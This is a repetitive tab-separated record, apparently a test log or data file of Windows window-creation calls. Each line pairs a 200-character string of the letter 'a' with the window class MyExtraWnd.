Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
Create	aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa	class_name = MyExtraWnd, wndproc_parameter = 0	1	Fn
